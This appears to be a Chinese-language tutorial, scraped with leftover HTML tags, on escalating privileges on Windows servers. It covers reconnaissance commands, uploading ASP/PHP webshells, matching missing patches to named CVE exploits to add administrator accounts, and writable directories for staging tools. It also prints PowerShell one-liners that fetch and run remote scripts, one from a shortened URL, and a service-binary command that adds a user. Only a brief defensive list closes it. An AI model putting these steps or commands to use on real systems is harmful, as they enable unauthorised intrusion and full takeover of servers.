Windows操作系统提权全面指南<\/h1>

一、Windows提权基础<\/h2>

0x00 Windows提权方向<\/h3>

内核提权<\/strong>：利用操作系统内核漏洞<\/li>
数据库提权<\/strong>：利用数据库服务漏洞<\/li>
应用提权<\/strong>：利用第三方应用程序漏洞<\/li>

中间人劫持<\/strong>：利用网络通信漏洞<\/li> <\/ol>
0x01 基础提权命令<\/h3>

系统信息查询<\/strong>：<\/p>
systeminfo <\/span><\/span>systeminfo | findstr \/B \/C:"OS名称"<\/span> \/C:"OS版本"<\/span> <\/span><\/span><\/code><\/pre><\/li> 主机信息<\/strong>：<\/p> hostname <\/span><\/span>set<\/span> # 查看环境变量 <\/span><\/span><\/code><\/pre><\/li> 用户信息<\/strong>：<\/p> net user <\/span><\/span><\/code><\/pre><\/li> 服务信息<\/strong>：<\/p> tasklist \/svc | find "TermService"<\/span> <\/span><\/span>netstat -ano | find "3389"<\/span> <\/span><\/span><\/code><\/pre><\/li> 系统详情<\/strong>：<\/p> wmic os get caption # 系统名 <\/span><\/span>wmic qfe get Description,HotFixID,InstalledOn # 补丁信息 <\/span><\/span>wmic qfe get Description,HotFixID,InstalledOn | findstr \/C:"KB4346084"<\/span> \/C:"KB4509094"<\/span> # 特定补丁 <\/span><\/span>wmic product get name,version # 已安装程序 <\/span><\/span><\/code><\/pre><\/li> <\/ul> 0x02 常见初始权限<\/h3> ASP\/PHP：匿名权限<\/li> ASPX：user权限<\/li> JSP：通常为系统权限<\/li> <\/ul> 0x03 提权前提条件<\/h3> 信息收集<\/strong>：<\/p> 服务器系统和版本位数<\/li> 服务器补丁情况<\/li> 安装软件情况<\/li> 防护软件情况<\/li> 端口开放情况<\/li> <\/ul> <\/li> 执行条件<\/strong>：<\/p> 确认能否执行系统命令<\/li> 寻找可写可执行目录<\/li> 根据补丁信息寻找对应exp<\/li> <\/ul> <\/li> <\/ol> 0x04 溢出漏洞提权<\/h3> 缓冲区溢出漏洞利用操作系统层漏洞进行权限提升，步骤：<\/p> 获取shell<\/li> 收集补丁信息<\/li> 匹配相应漏洞<\/li> 执行提权<\/li> <\/ol> 二、Windows提权实践<\/h2> 0x01 Pr提权实践<\/h3> 环境<\/strong>：IIS6.0存在解析漏洞<\/p> 步骤<\/strong>：<\/p> 上传ASP一句话木马<\/li> 连接webshell<\/li> 检查用户权限（通常无创建用户权限）<\/li> 检查系统补丁（确认无KB952004）<\/li> 上传pr.exe执行提权（利用CVE-2009-0079）<\/li> <\/ol> 0x02 Windows分析工具利用<\/h3> 1. WinSystemHelper<\/h4> 使用方法<\/strong>：<\/p> 上传bat+txt文件<\/li> 运行bat查看结果<\/li> <\/ol> 实践案例<\/strong>：<\/p> 在RECYCLER文件夹上传工具（通常有写权限）<\/li> 运行WinSysHelper.bat<\/li> 根据检测结果选择exp（如2011年漏洞）<\/li> 执行exp添加管理员用户<\/li> <\/ol> 2. Sherlock工具<\/h4> PowerShell脚本，检测本地提权漏洞<\/p> 使用方法<\/strong>：<\/p> # 本地加载<\/span> <\/span><\/span>Import-Module Sherlock.ps1 <\/span><\/span> <\/span><\/span># 远程加载<\/span> <\/span><\/span>IEX(New-Object System.Net.Webclient).DownloadString('https:\/\/raw.githubusercontent.com\/rasta-mouse\/Sherlock\/master\/Sherlock.ps1'<\/span>) <\/span><\/span> <\/span><\/span># 检查漏洞<\/span> <\/span><\/span>Find-AllVulns <\/span><\/span><\/code><\/pre>实践案例<\/strong>：<\/p> 通过PHP木马获取webshell<\/li> 使用phpspy.php执行命令<\/li> 上传Sherlock.ps1<\/li> 检测漏洞（如MS14-058）<\/li> 上传对应exp执行提权<\/li> <\/ol> 3. Privesc工具<\/h4> 枚举Windows错误安全配置<\/p> 使用方法<\/strong>：<\/p> # 本地加载<\/span> <\/span><\/span>Import-Module .\Privesc.psm1 <\/span><\/span> <\/span><\/span># 获取函数<\/span> <\/span><\/span>Get-Command -Module Privesc <\/span><\/span> <\/span><\/span># 检测全部<\/span> <\/span><\/span>Invoke-AllChecks <\/span><\/span> <\/span><\/span># 命令行执行<\/span> <\/span><\/span>powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1;Invoke-AllChecks}"<\/span> <\/span><\/span> <\/span><\/span># 远程调用<\/span> <\/span><\/span>powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http:\/\/dwz.cn\/2vkbfp');Invoke-AllChecks"<\/span> <\/span><\/span> <\/span><\/span># 添加用户<\/span> <\/span><\/span>Install-ServiceBinary -ServiceName '服务名'<\/span> -UserName user -Password password <\/span><\/span><\/code><\/pre>实践案例<\/strong>：<\/p> 检测服务配置漏洞<\/li> 通过Install-ServiceBinary添加用户<\/li> 将检测结果导出到文件<\/li> <\/ol> 0x03 提权实战案例<\/h3> 环境<\/strong>：Windows Server 2008<\/p> 步骤<\/strong>：<\/p> 上传ASP木马获取webshell<\/li> 检查权限（无创建用户权限）<\/li> 使用systeminfo查看系统信息<\/li> 匹配CVE-2018-8120漏洞<\/li> 在User\/All Users目录上传exp（通常有写权限）<\/li> 执行提权并创建管理员用户<\/li> <\/ol> 三、关键目录与技巧<\/h2> 可写目录<\/strong>：<\/p> RECYCLER（回收站）<\/li> User\/All Users<\/li> Temp目录<\/li> <\/ul> <\/li> 绕过限制技巧<\/strong>：<\/p> 上传cmd.exe替代不可用的系统命令<\/li> 使用phpspy.php等替代webshell执行命令<\/li> 利用IIS解析漏洞上传木马<\/li> <\/ul> <\/li> 信息收集重点<\/strong>：<\/p> 精确操作系统版本<\/li> 已安装补丁列表<\/li> 运行的服务列表<\/li> 环境变量设置<\/li> <\/ul> <\/li> <\/ol> 四、防御建议<\/h2> 及时安装系统补丁<\/li> 限制可写目录权限<\/li> 监控异常进程创建<\/li> 禁用不必要的服务<\/li> 使用最小权限原则<\/li> 定期检查系统配置<\/li> <\/ol> 通过系统化的信息收集、工具利用和漏洞匹配，可以有效实现Windows系统的权限提升。实际操作中需根据具体环境灵活选择提权路径。<\/p>